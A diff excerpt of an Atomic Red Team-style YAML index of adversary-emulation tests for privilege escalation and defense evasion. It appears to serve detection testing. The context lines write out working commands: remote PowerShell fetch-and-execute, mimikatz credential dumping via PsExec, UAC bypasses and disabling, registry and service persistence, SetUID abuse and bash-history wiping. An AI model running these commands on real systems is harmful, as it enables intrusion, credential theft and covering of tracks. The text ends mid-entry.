@@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it -' + ' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` -' + ' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) -' + ' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; -' + ' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script -' + ' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files -' + ' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} -' + ' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) -' + ' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories -' + ' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ -' + ' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. -' + ' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user -' + ' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force -' + ' executor: command: | Add-Content #{ps_profile} -Value "" @@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore -' + ' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process -' + ' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) -' + ' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" -' + ' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common -' + ' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common -' + ' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -' + ' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local -' + ' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi -' + ' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} -' + ' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook -' + ' elevation_required: true name: sh T1547.001: @@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" -' + ' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 -' + ' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" -' + ' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. -' + ' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 -' + ' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} -' + ' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 -' + ' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 -' + ' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. -' + ' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 -' + ' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. -' + ' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1547.009: @@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 -' + ' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist -' + ' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist -' + ' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. -' + ' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. -' + ' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; -' + ' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. -' + ' executor: name: bash elevation_required: true @@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; -' + ' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' -' + ' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user -' + ' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile -' + ' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user -' + ' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc -' + ' name: sh T1055.014: technique: @@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) -' + ' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force -' + ' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore -' + ' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore -' + ' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) -' + ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'cp /bin/ls #{file_to_pad} -' + ' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} -' + ' cleanup_command: 'rm #{file_to_pad} -' + ' name: sh T1542.003: technique: @@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands -' + ' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) -' + ' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} -' + ' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file -' + ' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) -' + ' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au -' + ' name: command_prompt T1574.012: technique: @@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm -' + ' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history -' + ' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm -' + ' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history -' + ' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history -' + ' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null -' + ' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history -' + ' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate -' + ' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history -' + ' name: sh - name: Clear history of a bunch 